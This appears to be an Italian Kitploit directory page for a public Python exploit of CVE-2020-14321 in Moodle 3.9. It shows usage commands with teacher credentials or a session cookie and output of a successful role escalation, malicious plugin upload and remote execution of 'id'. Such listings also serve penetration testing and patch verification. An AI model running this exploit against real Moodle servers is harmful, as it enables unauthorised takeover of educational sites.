Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/lanzt/cve-2020-14321
Escalation di PrivilegiGenerazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration Testing
GitHublanzt/cve-2020-14321

CVE-2020-14321

Script Python per sfruttare CVE-2020-14321 - Moodle 3.9 - Le iscrizioni ai corsi consentivano l'escalation dei privilegi dal ruolo di insegnante al ruolo di manager fino alla RCE.

Vedi Repository
2134 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Script Python per sfruttare CVE-2020-14321 - Moodle 3.9

Le iscrizioni ai corsi consentivano l'escalation dei privilegi dal ruolo di insegnante al ruolo di manager fino alla RCE.

  • Gli insegnanti di un corso potevano assegnarsi il ruolo di manager all'interno di quel corso.

Payload estratto da: https://github.com/HoangKien1020/CVE-2020-14321

Utilizzo

Se disponi di credenziali valide di insegnante (InReaLife questo non è stato testato abbastanza, o forse sì, non lo so :P):

root@kitploit:~
❭ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle -u lanz -p 'Lanz123$!'

Se hai un cookie valido di insegnante (testato al 101%):

root@kitploit:~
❱ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle --cookie th3f7k1ngggk00ci30ft3ach3r

...

root@kitploit:~
❱ python3 CVE-2020-14321_RCE.py http://moodle.site.com/moodle --cookie th3f7k1ngggk00ci30ft3ach3r -c id
 __     __     __   __  __   __              __  __     
/  \  /|_  __   _) /  \  _) /  \ __  /| |__|  _)  _) /| 
\__ \/ |__     /__ \__/ /__ \__/      |    | __) /__  | • by lanz

Moodle 3.9 - Remote Command Execution (Authenticated as teacher)
Course enrolments allowed privilege escalation from teacher role into manager role to RCE
                                                        
[+] Login on site: MoodleSession:th3f7k1ngggk00ci30ft3ach3r ✓
[+] Updating roles to move on manager accout: ✓
[+] Updating rol manager to enable install plugins: ✓
[+] Uploading malicious .zip file: ✓
[+] Executing id: ✓

uid=80(www) gid=80(www) groups=80(www)

Continuate a rompere tutto!!

Scarica lo strumento